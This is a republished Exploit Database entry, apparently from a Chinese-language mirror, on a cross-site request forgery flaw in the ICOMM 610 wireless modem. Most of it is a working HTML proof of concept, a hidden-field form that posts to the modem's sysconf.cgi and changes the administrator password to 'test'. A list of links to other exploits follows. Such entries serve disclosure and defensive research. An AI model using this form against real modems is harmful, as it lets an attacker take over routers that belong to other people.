ICOMM 610 Wireless Modem – Cross-Site Request Forgery

Exploit Database
14 阅读

作者： Blessen Thomas

日期： 2014-04-12
类别：
- remote
平台：
- hardware
来源：https://www.exploit-db.com/exploits/39138/

source: https://www.securityfocus.com/bid/66593/info

ICOMM 610 is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.

ICOMM 610 01.01.08.991 and prior are vulnerable. 

<html>
<!-- CSRF PoC --->
<body>
<form action="http://www.example.com/cgi-bin/sysconf.cgi?page=personalize_password.asp&sid=rjPd8QVqvRGX×tamp=1396366701157" method="POST">
<input type="hidden" name="PasswdEnable" value="on" />
<input type="hidden" name="New_Passwd" value="test" />
<input type="hidden" name="Confirm_New_Passwd" value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

last Exploits
ICOMM 610 Wireless Modem – Cross-Site Request Forgery的更多信息

Novell NetMail 3.52d – IMAP (Authenticated) Buffer Overflow (Metasploit)：
Alt-N MDaemon 9.6.4 – IMAPD FETCH Buffer Overflow (Metasploit)：
Glossword 1.8.8 < 1.8.12 - Arbitrary File Upload (Metasploit)：
Lotus Notes 8.0.x < 8.5.2 FP2 - Autonomy Keyview ('.lzh' Attachment) (Metasploit)：
Ipswitch TFTP Server 1.0.0.24 – Directory Traversal：
Sync Breeze Enterprise 10.4.18 – Remote Buffer Overflow (SEH)：
ES File Explorer 4.1.9.7.4 – Arbitrary File Read：
Yealink VoIP Phone SIP-T38G – Default Credentials：